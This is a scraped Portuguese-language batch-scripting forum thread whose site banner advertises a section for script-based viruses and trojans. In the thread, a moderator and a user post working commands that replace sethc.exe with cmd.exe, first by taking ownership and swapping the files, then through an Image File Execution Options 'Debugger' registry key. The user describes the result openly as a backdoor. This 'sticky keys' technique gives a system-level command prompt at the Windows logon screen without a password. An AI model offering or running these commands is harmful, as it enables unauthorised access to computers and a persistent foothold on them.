Batch-Satti
Se você ainda não é um membro cadastre-se!

Existem centenas de scripts para quem é membro.

As categorias para os membros cadastrados são:

BATCH-SCRIPTS COMPLETO.
(Espaço onde são postados os scripts que tenham funcionalidade completa)
BADCONS VIRUS E TROJANS .
(Espaço onde são postados scripts e técnicas em vírus trojans e worm baseados em scripts )
SOMENTE PARA MEMBROS.
(Espaço destinado aos membros discutirem ou tirarem duvidas)
TUTORIAIS E EXPLICAÇÕES.
(Aqui são colocadas as explicações de comandos e técnicas para confecção de scripts )

EXISTEM MUITAS OUTRAS CATEGORIAS MÁS ESSAS SÃO AS PRINCIPAIS !

ENTRE E PARTICIPE !!!!!!!
MENSAGENS AOS MEMBROS :
TIVEMOS QUE AUTORIZAR PROPAGANDAS NO FORUM E TALVEZ O FIREFOX E OUTROS NAVEGADORES NÃO FUNCIONEM
UTILIZEM O INTERNET EXPLORER OU ATUALIZEM PARA O FIREFOX 4.0 BETA

ASS. BOSS-HEAD



Participe do fórum, é rápido e fácil

Batch-Satti
Se você ainda não é um membro cadastre-se!

Existem centenas de scripts para quem é membro.

As categorias para os membros cadastrados são:

BATCH-SCRIPTS COMPLETO.
(Espaço onde são postados os scripts que tenham funcionalidade completa)
BADCONS VIRUS E TROJANS .
(Espaço onde são postados scripts e técnicas em vírus trojans e worm baseados em scripts )
SOMENTE PARA MEMBROS.
(Espaço destinado aos membros discutirem ou tirarem duvidas)
TUTORIAIS E EXPLICAÇÕES.
(Aqui são colocadas as explicações de comandos e técnicas para confecção de scripts )

EXISTEM MUITAS OUTRAS CATEGORIAS MÁS ESSAS SÃO AS PRINCIPAIS !

ENTRE E PARTICIPE !!!!!!!
MENSAGENS AOS MEMBROS :
TIVEMOS QUE AUTORIZAR PROPAGANDAS NO FORUM E TALVEZ O FIREFOX E OUTROS NAVEGADORES NÃO FUNCIONEM
UTILIZEM O INTERNET EXPLORER OU ATUALIZEM PARA O FIREFOX 4.0 BETA

ASS. BOSS-HEAD


Batch-Satti
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.
Pesquisa personalizada

Ir em baixo
avatar
ilunne
Idade : 33

Renover Sethc.exe Empty Renover Sethc.exe

Qui Mar 07, 2013 11:03 am
Colegas,
Preciso Renomear o arquivo Sethc.exe na pasta System32 do windows7 em um BAT.
Mesmo executando o cmd como administrador, para testar, da erro de acesso negado ao renomear ou mesmo deletar este arquivo.

Eu preciso fazer isso para automatizar uma rotina de manutenção que eu faço.
Alguém tem alguma idéia de como proceder?

Outra dúvida que eu tenho é quanto ao significado do comando "pushd %~dp0", que retorna ao diretório onde o arquivo foi executado. Por quê %~dp0?

Mad
Boss-Head
Boss-Head
Idade : 36

Renover Sethc.exe Empty Re: Renover Sethc.exe

Qui Mar 07, 2013 7:44 pm
[Você precisa estar registrado e conectado para ver este link.]

sua duvida pode ser sanada aqui Question

quanto ao Sethc.exe




@echo off
takeown /f %systemroot%\system32\sethc.exe
icacls %systemroot%\system32\sethc.exe /grant administrador:f
rename %systemroot%\system32\sethc.exe sethc.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe sethc.exe

tenta se não der vamos tentando....
avatar
ilunne
Idade : 33

Renover Sethc.exe Empty Re: Renover Sethc.exe

Ter Mar 26, 2013 1:40 pm
Boss-Head escreveu:[Você precisa estar registrado e conectado para ver este link.]

sua duvida pode ser sanada aqui Question

quanto ao Sethc.exe




@echo off
takeown /f %systemroot%\system32\sethc.exe
icacls %systemroot%\system32\sethc.exe /grant administrador:f
rename %systemroot%\system32\sethc.exe sethc.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe sethc.exe

tenta se não der vamos tentando....

a partir da linha rename da acesso negado,
eu tentei executar linha a linha no cmd em modo administrativo mas não deu...
que fazer?
avatar
ilunne
Idade : 33

Renover Sethc.exe Empty BackDoor Win7

Sex Abr 12, 2013 11:09 pm
A ajuda fornecida não teve resultado.
Entretanto, estendendo minha pesquisa, achei duas soluções, uma semelhando ao que pretendia fazer, e outra muito mais interessante e rápida, via registro do ruindows.

A intenção é criar um backdoor no meu computador, de forma semi-automática durante o processo de formatação.

Compartilho aqui os dois procedimentos:


+--------------------------------------+
Forma como eu esperava fazer
+--------------------------------------+

Basta substituir o arquivo (quase inútil) sethc.exe e copiar o cmd.exe com o nome sethc.exe. O sethc é responsável por mostrar aquela janela de advertência quando se pressiona shift 5 vezes, esta janela pode ser invocada na tela de logon.

Só que no windows 7 o proprietário deste arquivo está "acima" do grupo administradores, então é necessário primeiro tornar-se proprietário dele:

Código:
takeown /f "c:\windows\system32\Sethc.exe"
icacls "c:\windows\system32\Sethc.exe" /grant administradores:F

Depois é só seguir com o resto do script.

===================================
Forma mais eficiente
===================================

Não precisa apagar nem substituir arquivo, basta mexer no registro, via script mesmo:

Código:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Conteúdo patrocinado

Renover Sethc.exe Empty Re: Renover Sethc.exe

Voltar ao Topo
Permissão deste fórum:
Você não pode responder aos tópicos neste fórum